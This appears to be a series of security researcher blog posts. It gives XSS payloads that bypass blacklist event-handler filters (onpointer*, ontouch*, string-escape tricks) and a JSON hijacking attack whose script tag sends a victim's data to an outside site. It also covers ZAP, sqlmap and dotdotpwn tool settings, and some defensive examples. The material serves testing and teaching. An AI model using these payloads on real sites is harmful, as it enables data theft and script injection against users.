7/31/2019

onpoint* XSS Payload for bypassing blacklist-based event-handler XSS filters

Hi hackers.
I crafted XSS payloads for bypassing event handler protection. It is just simple code.

onpoint* is an event handler for pointing devices (such as tablets). It has actions similar to onmouse*, and it can be used for XSS protection bypass.


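There are event handlers that start with onpoint*. They behave much like onmouse*, and while testing I found that XSS is possible with them, so I'm writing it up as a blog post. (Reading only the TL;DR is fine..)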


<div onpointerover="alert(45)">this is onpointerover=alert(45)</div>


TL;DR (XSS Payloads)

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

What is onpointer* ?

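onpointer* is an event handler for pointing devices.
Details are at https://www.w3.org/TR/pointerevents/

As far as I know, these were originally handlers for pointing tools such as a mouse (this part is a little ambiguous..).
Anyway, a pointing tool is in practice much the same as a mouse, so the way the handlers are triggered is almost the same. They are handlers that receive pointing events: when the pointer is over the element, when it has passed by, when it has moved, and so on. See the link above for details.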

Event Handler of pointer
* onpointercancel
* onpointerdown
* onpointerenter
* onpointerleave
* onpointermove
* onpointerout
* onpointerover
* onpointerup
* gotpointercapture 
* lostpointercapture

onpoint* testing for xss

onpointerover
=> run mouseover

onpointerdown
=> run click

onpointerenter
=> run mouseover

onpointerleave
=> run mouseleave

onpointermove
=> run mouseleave

onpointerout
=> run mouseover

onpointerup
=> run mouseover

Valid Payload..
<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>



Other cheatsheets

OWASP
* onAfterPrint() (activates after user prints or previews print job)
* onAfterUpdate() (activates on data object after updating data in the source object)
* onBeforeActivate() (fires before the object is set as the active element)
* onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
* onBeforeCut() (attacker executes the attack string right before a selection is cut)
* onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
* onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
* onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
* onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
* onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
* onBeforeUpdate() (activates on data object before updating data in the source object)

Payload all the things
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>

Conclusion

Blacklist filtering based on these documents (OWASP, Payload all the things) can be bypassed, because neither OWASP nor Payload all the things has this content.

Since HTML5, there are really many different event handlers and tags. A lot of testing is needed.

It’s a simple trick, but hope it helps!
happy bug hunting and security engineering.

byebye!


Reference

https://www.w3.org/TR/pointerevents/

7/28/2019

JSON Hijacking with <script/src>

Hi hackers. It’s been a long time since I wrote a blog post.
I found a JSON Hijacking case that is not an SOP bypass, so I'm going to briefly explain it.

This is not a new technique. It's a very old, traditional technique. These days it's hard to come across a case, because so many services use Ajax-based (CORS) JSON.
[ plz don't make the wrong retweets :( ]


Vulnerable web service

Usually, many web servers request and process data based on JSON. Of course, local applications follow a similar trend.

A wide variety of data is handled with JSON. From the values for rendering web pages, to logs, to users' personal data, to important data, it's used in a lot of places.

Ajax calls, jQuery $, XMLHttpRequest and the like, which can handle JSON requests, are subject to SOP, so data transfer is not possible except within the same domain. To allow it, a whitelist is specified with CORS headers. So a lot of JSON Hijacking starts with a wrong CORS configuration. Some people also do it as a chained attack with XSS on the same domain, but that isn't important here.

I’ve written up SOP and JSON Hijacking before, so please refer to the link below.

https://www.hahwul.com/2016/12/web-hacking-sopsame-origin-policy-web.html

Vulnerable web service

There was a page that worked roughly like this.

[ Request ]
GET /getData?callback=abcd HTTP/1.1
Referer: www.hahwul.com

[ Response ]
200 OK
abcd({"name":"data~~"})

This is a function that returns important values when data is requested. Of course there was no CORS setting, so ordinary JSON Hijacking is not possible.

As you can see in the request above, you can specify a callback, which is reflected in the response. This is also a point for RXSS, but it has no direct impact because the application type is JSON.

It comes down to three points.
1) JSON call for secret data
2) reflected callback
3) no Referer check.. (my case: bypass of the Referer check logic)

JSON Hijacking with <script/src>

We can set callback to the value we need. When the URL is loaded from a <script> tag, this value is used as the code that is loaded into the script.

<script src="1.js">
</script>

<!-- 
//in 1.js 
alert(45)
-->

The alert function then runs on the domain that loaded the script with script/src.

Because we can choose the callback name, passing a payload like the one below reads the sensitive information from the target domain and passes it to the attacker's site.

[ Attack code ]
<script src="target.domain.com/getData?callback=document.location.href='https://www.hahwul.com?'+JSON.stringify"></script>

<!-- 
 + JSON.stringify : JSON format to String
 + A similar approach is also used for CSP bypass.
-->

[ Response ]
document.location.href='https://www.hahwul.com?'+JSON.stringify({"name":"data~~"})

[ Next request on attacker site ]
GET /?{\"name\":\"data~~~~\"}
Host: www.hahwul.com
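
The server-side counterpart to the three conditions listed above, as an added example that is not code from the original post or from the affected service: the callback is restricted to a plain identifier and the requesting origin is compared exactly against a list. `handleGetData`, `TRUSTED_ORIGINS`, the request shape and the `example.test` hosts are assumptions made for illustration.

```javascript
// Added example. TRUSTED_ORIGINS, handleGetData and the request shape are
// assumptions for illustration; they are not the vulnerable service's code.
const TRUSTED_ORIGINS = new Set(["https://app.example.test"]); // constructed value

// A callback may only be a plain identifier: no dots, quotes, "=", "+" or "(".
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/;

// Parse a header value as a URL and return its origin, or null if it is not one.
function originOf(value) {
  try {
    return new URL(value).origin;
  } catch {
    return null;
  }
}

// req: { query: { callback }, headers: { origin, referer } }
// Returns { status, contentType, body } without touching the network.
function handleGetData(req, secretData) {
  const callback = String(req.query.callback || "");
  // Condition 2 in the post: the callback is reflected verbatim.
  if (!CALLBACK_RE.test(callback)) {
    return { status: 400, contentType: "text/plain", body: "invalid callback" };
  }
  // Condition 3: no Referer check. A valid callback name alone is not enough,
  // because any page can define a function called "abcd" and load this URL in
  // a <script> tag. Compare the exact origin, never a substring of the header.
  const source = originOf(req.headers.origin || req.headers.referer || "");
  if (source === null || !TRUSTED_ORIGINS.has(source)) {
    return { status: 403, contentType: "text/plain", body: "cross-site request refused" };
  }
  return {
    status: 200,
    contentType: "application/javascript",
    body: callback + "(" + JSON.stringify(secretData) + ");",
  };
}

// Constructed requests: the payload from the post, two cross-site loads, one same-site load.
const SAMPLE_REQUESTS = [
  { query: { callback: "document.location.href='https://www.hahwul.com?'+JSON.stringify" },
    headers: { referer: "https://attacker.example.test/" } },
  { query: { callback: "abcd" }, headers: { referer: "https://attacker.example.test/" } },
  { query: { callback: "abcd" }, headers: { referer: "https://app.example.test.attacker.example.test/" } },
  { query: { callback: "abcd" }, headers: { referer: "https://app.example.test/view" } },
];

function runSamples() {
  return SAMPLE_REQUESTS.map((req) => handleGetData(req, { name: "data~~" }).status);
}
```

A request that carries neither an Origin nor a Referer header is refused, so the check fails closed.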

7/25/2019

Event handler for mobile used in XSS (ontouch*)

Some event handlers do not appear in the OWASP list.
These are the touch events, ontouch*. They only work on mobile devices, so they are less effective than general-purpose handlers, but they are a good way to trigger XSS.

(In fact, I sometimes forget this event handler, so I'm taking a note!)

<body ontouchstart=alert(45)> 
<body ontouchend=alert(45)>   
<body ontouchmove=alert(45)>  
<!-- 

[ ontouchstart ]
Triggers when a finger touches the screen

[ ontouchend ]
Triggers when a finger is removed from touch screen

[ ontouchmove ]
When a finger is dragged across the screen. 

-->


Mobile only; PC browsers do not run this code.
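
For filter authors, the point of both the onpointer* post and this ontouch* note can be checked in a few lines. The following is an added example, not code from the original posts: it compares a deny-list of handler names with a rule that flags every attribute whose name starts with "on". `DENYLIST` and the two control samples are constructed for illustration.

```javascript
// Added example. DENYLIST is a constructed stand-in for a filter built from an
// older handler list; it is not taken from any real product.
const DENYLIST = new Set([
  "onclick", "onerror", "onload", "onfocus", "onmouseover", "onmouseenter",
  "onmouseleave", "onmousemove", "onmouseout", "onmousedown", "onmouseup",
]);

// Return the lower-cased attribute names of every start tag in a fragment.
// Quoted values are skipped as a unit, so a ">" inside a value does not end the tag.
// This regex scan only demonstrates the rule; a real sanitizer should walk a
// parsed DOM and keep an allowlist of attributes.
function attributeNames(html) {
  const tagRe = /<[a-zA-Z][^\s\/>]*((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;
  const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  for (const tag of html.matchAll(tagRe)) {
    for (const attr of tag[1].matchAll(attrRe)) {
      names.push(attr[1].toLowerCase());
    }
  }
  return names;
}

// Deny-list rule: flags only the names someone remembered to list.
function flaggedByDenylist(html) {
  return attributeNames(html).filter((name) => DENYLIST.has(name));
}

// Prefix rule: every inline handler attribute starts with "on", whatever the event.
function flaggedByPrefix(html) {
  return attributeNames(html).filter((name) => name.startsWith("on"));
}

// Payloads quoted from the posts above, plus two constructed controls.
const SAMPLES = [
  '<div onpointerover="alert(45)">hahwul(45)</div>',
  '<div onpointerup="alert(45)">hahwul(45)</div>',
  "<body ontouchstart=alert(45)>",
  '<div onmouseover="alert(45)">control</div>',
  '<a href="https://example.test/?on=1" title="onset">control</a>',
];

// One row per sample: what each rule flags.
function compareRules() {
  return SAMPLES.map((html) => ({
    html,
    denylist: flaggedByDenylist(html),
    prefix: flaggedByPrefix(html),
  }));
}
```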


HTTP Request(ZAP, Burp) Parsing on Ruby code (Method , Headers, etc...)

https://github.com/hahwul/XSpear/issues/10
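There was a suggestion like this for XSpear. I think it describes saving the packet data used in Burp, ZAP and similar tools to a file, then reading it with an option so that the URL, headers and so on are parsed and used automatically (just like sqlmap does).

I wrote some simple logic to handle this and am leaving it here as a blog post. (I had thought about this back when I was making the mandu library, but once I actually implemented it, it turned out to be really simple.)

Actually applying it to XSpear will probably need various defensive code as well, so.. that will be difficult today.


Algorithm

1) Split on newline characters
2) The very first line holds the method and the URL
 + Split the first line once more on spaces to separate the method, path and HTTP/1.1
3) From the next line on is the header area; split on ': '
4) The front part of the split data is the header name, the rest is the header value
5) A header value can itself contain ': ', so only the first split is used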

in the Code

Code!
r = "GET https://www.hahwul.com/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Connection: keep-alive
Cookie: _ga=GA1.2.1102548207.1555467144; _gid=GA1.2.1362788908.1563875038
Upgrade-Insecure-Requests: 1
Host: www.hahwul.com"

method = ""
path = ""
headers = {}
switch = true   # true while we are still on the request line

r.each_line do |line|
  line = line.chomp      # drop the line ending so it does not end up in header values
  break if line.empty?   # blank line: end of the headers, a body (if any) follows
  if switch
    # Request line: "METHOD target HTTP/1.1"
    temp = line.split(" ")
    method = temp[0]
    path = temp[1]
    switch = false
  else
    # Split on the first ": " only; a header value may itself contain ": "
    hn, hd = line.split(": ", 2)
    headers[hn] = hd
  end
end

# Burp or ZAP
# ZAP format if the target starts with http or https, otherwise Burp format
url = path.start_with?('http://', 'https://') ? path : headers['Host'] + path

puts "URL: "+url
puts "\n"
puts "Method: "+method
puts "\n"
puts "Path: "+path
puts "\n"
puts "Headers\n"+headers.to_s

Test!
$ ruby test.rb
URL: https://www.hahwul.com/

Method: GET

Path: https://www.hahwul.com/

Headers
{"User-Agent"=>"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language"=>"ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3", "Connection"=>"keep-alive", "Cookie"=>"_ga=GA1.2.1102548207.1555467144; _gid=GA1.2.1362788908.1563875038", "Upgrade-Insecure-Requests"=>"1", "Host"=>"www.hahwul.com"}

7/16/2019

Displaying a CLI-based table in a Ruby application on the terminal

I'm simply writing this down (as a note). It is easy to develop using terminal-table.

How to Install?

gem install terminal-table

on Code

You can set the header or size using options of the terminal-table object, and the data can be put into an Array list.

require 'terminal-table'


rows = []
rows << ['xss', 'on']
rows << ['sqli', 'on']
rows << ['code', 'on']


table = Terminal::Table.new
table.title = "Cheatsheet"
table.headings = ['type', 'state']
table.rows = rows
table.style = {:width => 40}


# > puts table
+-------------------+------------------+
|              Cheatsheet              |
+-------------------+------------------+
| type              | state            |
+-------------------+------------------+
| xss               | on               |
| sqli              | on               |
| code              | on               |
+-------------------+------------------+

I applied this to the tool I created.



7/08/2019

XSS payload for escaping the string in JavaScript

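This afternoon I found an interesting payload, made a note of it, and am now writing it up.
It can be used when your input is inserted inside JavaScript but you cannot escape the string, and I suspect there are quite a few places where this kind of pattern shows up.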


XSS Payload

@_zulln recently published an interesting XSS payload.
https://twitter.com/_zulln/status/1147188307484446725

<script>
  var test = "injection <!-- <script/";
</script>

<img src="</script><script>alert(origin)</script>">

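At a glance it looks as if only the value injection <!-- <script/ goes into the test variable, but when the page actually runs, the closing script tag (</script>) is ignored, and this can be used to escape the string section inside JavaScript and execute statements.

View-source highlighting shows it that way too.. interesting



Hmm.. honestly, I don't know how it works.

My guess is that <!-- makes the processing of what follows get ignored, but since this isn't normal syntax, I think it may simply be a processing error in the browser. Of course… seeing that it triggers in both Chrome and Firefox, I wonder whether there is a fundamental common problem..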

Escape double quote(String) in Javascript

While I'm at it, here are a few ways to escape a string inside JavaScript.

1. with <!-- <script/
<script>
  var test = "injection <!-- <script/";
</script>

<img src="</script><script>alert(origin)</script>">

2. with </script>
<script>
  var test = "</script><svg/onload=alert(45)>"
</script>

3. with double quote and plus
<script>
  var test = ""+alert(45)+""
  // user input: "+alert(45)+"
</script>

4. with backslash
<script>
  var test = "\", test1="+alert(45)//input2"
  // Original: var test = "input1", test1="input2"
  // user input1: \
  // user input2: +alert(45)//
</script>
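
The output encoding that closes all four cases above, shown next to the concatenation they exploit. This is an added example, not code from the original post or from @_zulln; the function names and the `CASES` list are assumptions, with the inputs taken from the cases above.

```javascript
// Added example: names below are illustrative, not from the original post.

// The pattern the post attacks: user input concatenated into a string literal.
function naiveLiteral(value) {
  return '"' + value + '"';
}

// Hardened form: JSON.stringify escapes " and \ and control characters; the
// extra pass turns <, >, &, ' and U+2028/U+2029 into \uXXXX escapes.
// Case 1 relies on the HTML tokenizer: inside a script element, "<!--" followed
// by "<script" enters the script-data double-escaped state, where the next
// "</script>" does not end the element. With no raw "<" left in the literal,
// the tokenizer never sees "<!--", "<script" or "</script" there.
function toScriptStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (ch) => "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Build the two-variable statement from case 4 with a chosen encoder.
function renderStatement(encode, input1, input2) {
  return "var test = " + encode(input1) + ", test1 = " + encode(input2) + ";";
}

// True when the text is exactly one string literal with no angle brackets.
// A valid JSON string is also a single JavaScript string literal.
function staysInsideString(literal) {
  if (/[<>]/.test(literal)) return false;
  try {
    return typeof JSON.parse(literal) === "string";
  } catch {
    return false;
  }
}

// Inputs taken from the four cases in the post.
const CASES = [
  "injection <!-- <script/",
  "</script><svg/onload=alert(45)>",
  '"+alert(45)+"',
  "\\",
];

// One row per case: does each encoder keep the input inside the string?
function auditCases() {
  return CASES.map((input) => ({
    input,
    naive: staysInsideString(naiveLiteral(input)),
    hardened: staysInsideString(toScriptStringLiteral(input)),
  }));
}
```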

7/03/2019

ZAP Send to Any tools(My Application settings, Send to Burpsuite and Other tools)

Hi friends?! I shared the applications settings in ZAP yesterday(https://www.hahwul.com/2019/07/easy-security-testing-with-applications-bridge-in-zap.html).
I’m going to share some of the settings that I was writing separately today.

Let’s get started, my go-to settings :)


ZAP Send to Any tools

Send to burp scan(2.0)

Full Command: /usr/local/bin/curl
Parameters: -i -k 127.0.0.1:1337 -X POST -d '{"urls":["%url%"]}' -H 'Content-Type: application/json;'

Add scan burp
(https://www.hahwul.com/2018/09/burp-suite-rest-api-burp-2.0.html)
POST /scan HTTP/1.1
Host: 127.0.0.1:1337


{
  "urls":["https://www.hahwul.com"]
}

Send to SQLMap

SQLMAP(GET)
Full Command: /usr/local/bin/sqlmap
Parameters: --dbs --no-cast --random-agent -u %url% --cookie %cookie%

SQLMAP(POST)
Full Command: /usr/local/bin/sqlmap
Parameters: --dbs --no-cast --random-agent -u %url% --cookie=%cookie% --data=%postdata%

Send to A2SV

Full Command: /usr/local/bin/a2sv
Parameters: -t %host% -p %port%

Send to ddp(dotdotpwn)

Full Command: /Users/hahwul/HAHWUL/tool/dotdotpwn/dotdotpwn.pl
Parameters: -m http-url -h %host% -u %url% -k "root:"
e.g
https://127.0.0.1/lib/file_download.asp?FilePath=TRAVERSAL

Send to Arachni

arachni
Full Command: /usr/local/bin/arachni-cli
Parameters: --output-verbose --scope-include-subdomains %url%

arachni (only xss)
Full Command: /usr/local/bin/arachni-cli
Parameters: %url% --checks=xss*

Send to Arjun

GET
Full Command: python3 arjun.py
Parameters: -u %url% --get --headers "Cookie: %cookie%"

POST
Full Command: python3 arjun.py
Parameters: -u %url% --post --headers "Cookie: %cookie%"

My Private Setting?

Secret :P


7/02/2019

Easy security testing with applications bridge in ZAP(with SQLMap, XSStrike, etc..)

ZAP has one interesting feature: it can call external applications. Working with external tools this way makes security testing easier and more powerful.
(I couldn't be bothered to write two posts, so I'm leaving both together. ZAP's Application feature lets you do security testing a little more easily.)

Today’s post is about how to use the applications bridge(?) in ZAP.
(It's nothing special.. it's just the external application integration feature!)


Warm-up exercise (How to set it up?)

Open Application Menu

First, open the application settings page. There are two ways:

- Options > Applications
- Context Menu(Right Click) > Run Application > Configure Applications



Once an application is added to ZAP here, you can call it directly from the Context Menu (right click)!

Set Application Info (with data pattern in zap)

ZAP's application feature not only runs apps; it can also parse HTTP request/response data from places such as History and Requester and pass it as argument values. If you use it well, you will be able to test faster.
(The interesting part is that it doesn't just run the application, it can pass argument values to it. So the data you were testing in ZAP can be handed to an external app as-is.)

These are the special patterns defined in ZAP.

%url%
the full url, e.g. 'http://localhost/test?a=b' 

%site% 
the site, e.g. 'http://localhost:8080/' 

%host% 
the hostname, e.g. 'localhost' 

%port% 
the port, e.g. '80' 

%cookie% 
the first cookie field from the request header (if any) 

%postdata% 
the POST data sent, if any, with any newlines replaced with "\n" 

%msgid% 
the HTTP message id to fetch data from the API (/JSON/core/view/message/?id=$msgid), does not always exist, will return -1 if no message id

%header-{{ header }}% 
the request header by name (if any), e.g. %header-user-agent% would return the value of the User-Agent header

My sample data.. sqlmap
Full Command: /usr/local/bin/sqlmap
Working Dir: /usr/local/bin
Parameter: --dbs --no-cast --random-agent -u %url%




In addition to sqlmap, you can conveniently perform tasks such as XSStrike and dotdotpwn.

Run application on ZAP

Right click > Run Application > Your App!

[/usr/local/bin/sqlmap, --dbs, --no-cast, --random-agent, -u, https://www.hahwul.com]
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:10:29 /2019-07-02/

[00:10:29] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3' from file '/usr/local/Cellar/sqlmap/1.3.3/libexec/txt/user-agents.txt'
[00:10:29] [INFO] testing connection to the target URL
[00:10:32] [INFO] heuristics detected web page charset 'ISO-8859-2'
[00:10:33] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:10:37] [INFO] testing if the target URL content is stable
[00:10:37] [INFO] target URL content is stable
[00:10:37] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')

[*] ending @ 00:10:37 /2019-07-02/

